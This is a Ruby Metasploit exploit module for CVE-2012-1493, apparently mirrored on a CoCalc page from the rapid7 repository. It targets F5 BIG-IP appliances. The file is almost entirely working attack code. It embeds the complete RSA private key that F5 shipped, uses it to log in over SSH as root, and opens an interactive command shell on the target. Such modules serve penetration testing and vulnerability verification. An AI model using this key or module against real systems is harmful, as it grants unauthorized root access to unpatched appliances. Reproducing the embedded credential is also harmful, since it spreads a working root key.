Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
28443 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'net/ssh'

7
require 'net/ssh/command_stream'

8
require 'rex/socket/ssh_factory'

9


10
class MetasploitModule < Msf::Exploit::Remote

11
  Rank = ExcellentRanking

12


13
  include Msf::Auxiliary::Report

14
  include Msf::Exploit::Remote::SSH

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'F5 BIG-IP SSH Private Key Exposure',

21
        'Description' => %q{

22
          F5 ships a public/private key pair on BIG-IP appliances that allows

23
          passwordless authentication to any other BIG-IP box. Since the key is

24
          easily retrievable, an attacker can use it to gain unauthorized remote

25
          access as root.

26
        },

27
        'Platform' => 'unix',

28
        'Arch' => ARCH_CMD,

29
        'Privileged' => true,

30
        'Targets' => [ [ 'Universal', {} ] ],

31
        'Payload' => {

32
          'Compat' => {

33
            'PayloadType' => 'cmd_interact',

34
            'ConnectionType' => 'find'

35
          }

36
        },

37
        'Author' => ['egypt'],

38
        'License' => MSF_LICENSE,

39
        'References' => [

40
          [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ],

41
          [ 'CVE', '2012-1493' ],

42
          [ 'OSVDB', '82780' ],

43
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ],

44
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]

45
        ],

46
        'DisclosureDate' => '2012-06-11',

47
        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

48
        'DefaultTarget' => 0,

49
        'Notes' => {

50
          'Stability' => [CRASH_SAFE],

51
          'Reliability' => [REPEATABLE_SESSION],

52
          'SideEffects' => []

53
        }

54
      )

55
    )

56


57
    register_options(

58
      [

59
        # Since we don't include Tcp, we have to register this manually

60
        Opt::RHOST(),

61
        Opt::RPORT(22)

62
      ], self.class

63
    )

64


65
    register_advanced_options(

66
      [

67
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),

68
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])

69
      ]

70
    )

71
  end

72


73
  # helper methods that normally come from Tcp

74
  def rhost

75
    datastore['RHOST']

76
  end

77


78
  def rport

79
    datastore['RPORT']

80
  end

81


82
  def do_login(user)

83
    opt_hash = ssh_client_defaults.merge({

84
      auth_methods: ['publickey'],

85
      port: rport,

86
      key_data: [ key_data ]

87
    })

88


89
    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']

90


91
    begin

92
      ssh_socket = nil

93
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

94
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)

95
      end

96
    rescue Rex::ConnectionError

97
      return

98
    rescue Net::SSH::Disconnect, ::EOFError

99
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

100
      return

101
    rescue ::Timeout::Error

102
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"

103
      return

104
    rescue Net::SSH::AuthenticationFailed

105
      print_error "#{rhost}:#{rport} SSH - Failed authentication"

106
    rescue Net::SSH::Exception => e

107
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"

108
      return

109
    end

110


111
    return false unless ssh_socket

112


113
    # Create a new session from the socket, then dump it.

114
    conn = Net::SSH::CommandStream.new(ssh_socket, logger: self)

115
    ssh_socket = nil

116
    conn

117
  end

118


119
  def exploit

120
    conn = do_login('root')

121
    if conn

122
      print_good 'Successful login'

123
      handler(conn.lsock)

124
    end

125
  end

126


127
  def key_data

128
    <<~EOF

129
      -----BEGIN RSA PRIVATE KEY-----

130
      MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh

131
      UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk

132
      OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB

133
      gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF

134
      8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv

135
      7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM

136
      2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s

137
      37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL

138
      RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4

139
      rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/

140
      uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU

141
      Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G

142
      LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS

143
      -----END RSA PRIVATE KEY-----

144
    EOF

145
  end

146
end

147


148